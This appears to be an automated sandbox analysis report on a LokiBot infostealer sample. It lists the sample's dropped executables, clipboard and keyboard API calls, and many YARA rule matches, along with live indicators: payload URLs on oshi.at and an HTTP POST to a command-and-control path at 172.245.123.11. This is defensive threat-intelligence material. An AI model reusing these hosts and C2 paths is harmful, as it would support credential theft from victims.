Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.123.11

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0078CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0078CE44

Source: global traffic	HTTP traffic detected: GET /rtBS?N HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /BLZu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: oshi.at

Source: unknown

HTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 180Connection: close

Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: palladiums.exe, palladiums.exe, 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at
Source: Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at/BLZu
Source: Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000000.2085021308.0000000000542000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://oshi.at/BLZuM
Source: svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at/rtBS
Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Dhy2kmz.exe, 00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2153883300.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2168636242.0000000006720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: svchost.exe, 00000003.00000003.2091913046.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091835417.0000000003087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2091880477.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, Dhy2kmz.exe, 00000004.00000002.2165483979.0000000006102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.5:49713 version: TLS 1.2

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0078EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0078EAFF

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0078ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0078ED6A
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_000AED6A

Source: C:\Users\user\Desktop\9876567899.bat.exe

0_2_0078EAFF

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0077AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0077AA57

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_007A9576
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_000C9576

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
